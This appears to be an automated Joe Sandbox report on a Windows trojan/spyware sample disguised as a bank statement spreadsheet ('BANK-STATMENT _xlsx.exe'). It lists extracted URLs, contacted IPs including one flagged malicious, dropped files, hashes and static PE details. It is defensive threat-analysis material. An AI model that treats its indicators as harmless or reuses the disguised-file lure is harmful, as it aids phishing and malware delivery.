                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.carterandcone.comgBANK-STATMENT _xlsx.exe, 00000001.00000003.670678801.0000000005126000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.carterandcone.comlBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.jiyu-kobo.co.jp/Y0ntBANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.founder.com.cn/cn/BANK-STATMENT _xlsx.exe, 00000001.00000003.669521206.0000000005105000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cnBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.669103284.0000000005122000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/frere-user.htmlBANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.comeBANK-STATMENT _xlsx.exe, 00000001.00000002.773005820.0000000005100000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.fontbureau.comoituBANK-STATMENT _xlsx.exe, 00000001.00000003.675782658.00000000050FF000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.carterandcone.comzBANK-STATMENT _xlsx.exe, 00000001.00000003.670800155.0000000005106000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/cabarga.htmlBANK-STATMENT _xlsx.exe, 00000001.00000003.675887823.000000000512B000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.675857787.000000000512A000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.founder.com.cn/cn7BANK-STATMENT _xlsx.exe, 00000001.00000003.668963519.000000000510A000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://static-global-s-msn-com.akvbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.fontbureau.comcomFBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.founder.com.cn/cn8BANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://contextual.media.net/checksync.php?&vsSynvbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpfalse
                                                                          high
                                                                          http://www.fontbureau.com/designers8BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.jiyu-kobo.co.jp/jBANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.msn.com/?ocid=iehpEM3LMEMvbc.exe, 0000001A.00000002.838373686.0000000000758000.00000004.00000020.sdmpfalse
                                                                              high
                                                                              http://www.fontbureau.comalicBANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.tiro.comic
                                                                              BANK-STATMENT _xlsx.exe, 00000001.00000003.670925242.00000000050FC000.00000004.00000001.sdmp
                                                                              false
                                                                              • Avira URL Cloud: safe
                                                                              unknown

                                                                              Contacted IPs


                                                                              Public

                                                                              IP              Domain    Country         ASN     ASN Name                      Malicious
                                                                              104.16.154.36   unknown   United States   13335   CLOUDFLARENETUS               false
                                                                              104.16.155.36   unknown   United States   13335   CLOUDFLARENETUS               false
                                                                              166.62.27.57    unknown   United States   26496   AS-26496-GO-DADDY-COM-LLCUS   true

                                                                              Private

                                                                              IP
                                                                              192.168.2.1

                                                                              General Information

                                                                              Joe Sandbox Version:31.0.0 Red Diamond
                                                                              Analysis ID:320625
                                                                              Start date:19.11.2020
                                                                              Start time:16:01:48
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 14m 44s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:BANK-STATMENT _xlsx.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:40
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.phis.troj.spyw.evad.winEXE@53/29@20/4
                                                                              EGA Information:Failed
                                                                              HDC Information:
                                                                              • Successful, ratio: 80.4% (good quality ratio 78.5%)
                                                                              • Quality average: 85.2%
                                                                              • Quality standard deviation: 24%
                                                                              HCA Information:
                                                                              • Successful, ratio: 87%
                                                                              • Number of executed functions: 113
                                                                              • Number of non-executed functions: 394
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Found application associated with file extension: .exe
                                                                              Warnings:
                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.255.188.83, 40.88.32.150, 51.104.144.132, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 52.147.198.201
                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              Time       Type              Description
                                                                              16:02:55   API Interceptor   63x Sleep call for process: BANK-STATMENT _xlsx.exe modified
                                                                              16:03:31   API Interceptor   5x Sleep call for process: dw20.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs


                                                                              Domains


                                                                              ASN


                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_15082965\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18590
                                                                              Entropy (8bit):3.762256301757226
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_1534c334\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18586
                                                                              Entropy (8bit):3.7636886014541706
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_17308cf2\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18590
                                                                              Entropy (8bit):3.7637503088136137
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_1aa0f8cb\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18592
                                                                              Entropy (8bit):3.763786373480976
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bank-statment _x_319d48559b0a1af85a57a6082102ce05f64a1d9_00000000_173bee50\Report.wer
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18230
                                                                              Entropy (8bit):3.7611081288567427
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2128.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):5692
                                                                              Entropy (8bit):3.7319624624525853
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER21C5.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.47363119991153
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DA4.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7706
                                                                              Entropy (8bit):3.7093624418460873
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E9F.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476145816240227
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER65F6.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7664
                                                                              Entropy (8bit):3.7013706190950346
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER66C2.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476517921665472
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB64.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):5692
                                                                              Entropy (8bit):3.7362665521032725
                                                                              Encrypted:false
                                                                              Malicious:false
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC01.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476622485131769
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zszJgtWI9sqWSC8BG8fm8M4JFKA7Fo+q8v9ocv4H+d:uITfNfLSNZJFKpKCcvg+d
                                                                              MD5:55661D3A5A477629000B09FD2C3C93D3
                                                                              SHA1:A1CCD794CA275B2EE5D5838C2DE3E9D9D710AC2D
                                                                              SHA-256:0A1564FA4EBFCC9E226BAE441CDF3F28C45BFA00819361EBE641834A4EC7E0A6
                                                                              SHA-512:A60C6204867768D8DBF69B414C649696D4C028299ACB064C99A71C23CA5AEFC51E66CA3A666BD2586EBDD4E5565E2BF3C7E09921C8A623C69DD9534D9B12406C
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0FB.tmp.WERInternalMetadata.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):5692
                                                                              Entropy (8bit):3.7361337278264863
                                                                              Encrypted:false
                                                                              SSDEEP:96:RtIU6o7r3GLt3iiR6U9cEIXDkYZHuvUubSfOyWggwB+aM1uc1fEXam:Rrl7r3GLNiiR69rzkYZHuvUubS/+p1uj
                                                                              MD5:282364D123559D1559F1BE3C7CE12993
                                                                              SHA1:1900116F8645DD67581E3A3E880588384FA5C3A9
                                                                              SHA-256:A8FA38E71D604414E4ABF48AF5479B672B5613A273F9E56F06C2FB369DA8F7C7
                                                                              SHA-512:8087299D86A418356FD8E61D76688562A136D3ED384136B1F6900A865D3555FBA0036E12B9BF045A2F762ADCC71DD1E479557DBA86177DF6B58E8C95C59CD8AF
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>17134</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>....<Revision>1</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>1033</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>5580</Pid>...
                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1C7.tmp.xml
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4657
                                                                              Entropy (8bit):4.476286019433985
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwSD8zszJgtWI9sqWSC8BE8fm8M4JFKA7Fk+q8v9+cv4Hdd:uITfNfLSNHJFKZKAcvgdd
                                                                              MD5:9E3FCD004985DFA030F0F51B1AB27043
                                                                              SHA1:CDB35AD87D4306A2461EAE7D41BE6F62577E9B07
                                                                              SHA-256:73BE6578D438CAEBB83EB34868719FC42AB31EA1C82BE191CAE33BD0B0CFC22E
                                                                              SHA-512:619345A0AC68CB08AC5201B8E75E6F95288B7CE6ACF06A4084F3EC3ED996CDF71828211B0E6C20263C86C6F75BB5F4FAF6B7F02E314D9EF5C788C110F89607C6
                                                                              Malicious:false
                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="735855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                              C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                              Malicious:false
                                                                              Preview: ..
                                                                              C:\Users\user\AppData\Roaming\pid.txt
                                                                              Process:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):2.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:BR:n
                                                                              MD5:EF0D17B3BDB4EE2AA741BA28C7255C53
                                                                              SHA1:E3479C19053568CE27FCC573669D61191419B296
                                                                              SHA-256:CF5DF267131383187BDB3D2C59A8718E37AC3103AE6612E9EE5FD113A75116E9
                                                                              SHA-512:FD2595FEEB081D9BC1938F59C4F641B895DABD0AD71987F0CA5E278666714B866B4BCC4DDEB8056D1280292C09B82022B9E01C4448B63FF2A8CE9A0C17064BAA
                                                                              Malicious:false
                                                                              Preview: 2864
                                                                              C:\Users\user\AppData\Roaming\pidloc.txt
                                                                              Process:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):46
                                                                              Entropy (8bit):4.50771291359613
                                                                              Encrypted:false
                                                                              SSDEEP:3:oNt+WfWna2ivf6+J:oNwva7jJ
                                                                              MD5:17A331B7B14347C9BF55C859D564272C
                                                                              SHA1:44A7FB06E7DC2D59BDADBA10D88E936BAF85C9ED
                                                                              SHA-256:714BF368D097C449B0C4A831E70AAF6C077860B7B2FFF3BD68687879F2C73D8E
                                                                              SHA-512:A5AE156BBE52F34AA62C31BAA5B8A4A8CA893E36A843D7862B0039101781757AD242C0A6998AAF58491ACE8316C071579CEAB1623163B473F27BEB78F074869D
                                                                              Malicious:false
                                                                              Preview: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.9327470610312085
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                              • InstallShield setup (43055/19) 0.43%
                                                                              • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              File name:BANK-STATMENT _xlsx.exe
                                                                              File size:965120
                                                                              MD5:debe564cd4c27c02d23c828df27fe27f
                                                                              SHA1:1b55fba242460cc0a5b38299acaaacf3f54c5e87
                                                                              SHA256:edafe7e62738e180cb882d93f37d2d306627aef482d6f7a7a06c69198c61cd58
                                                                              SHA512:07091b073d5885787f830a6a02a39f1064a80767ac02aea87bbc66ccb93406fba2f7a7bdd9d02d4c04f18b54bb59b34d0fd3e97649584363008c56b126801c37
                                                                              SSDEEP:24576:6odaqxzLqAc4TDlEO9KqOidDy70cd4gKsvi:Rj1uVmhpOidDyv1Ksa
                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:be9eeecece709286

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x46add0
                                                                              Entrypoint Section:CODE
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:dfbd2d8adc9d5f58fb80cc271c1cf580

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFF0h
                                                                              mov eax, 0046AC20h
                                                                              call 00007F6BE4B3C7C9h
                                                                              mov eax, dword ptr [00486C60h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F6BE4B8B5D1h
                                                                              mov ecx, dword ptr [00486D50h]
                                                                              mov eax, dword ptr [00486C60h]
                                                                              mov eax, dword ptr [eax]
                                                                              mov edx, dword ptr [0046A72Ch]
                                                                              call 00007F6BE4B8B5D1h
                                                                              mov eax, dword ptr [00486C60h]
                                                                              mov eax, dword ptr [eax]
                                                                              call 00007F6BE4B8B645h
                                                                              call 00007F6BE4B3A2C0h
                                                                              lea eax, dword ptr [eax+00h]
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              Name                                  Virtual Address  Virtual Size  Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x88000          0x247a        .idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x95000          0x5bc5c       .rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8d000          0x7044        .reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS             0x8c000          0x18          .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                              Sections

                                                                              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                              CODE    0x1000           0x69e18       0x6a000   False     0.524259747199   data       6.51526332301  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              DATA    0x6b000          0x1bddc       0x1be00   False     0.171822449552   data       2.72180144261  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
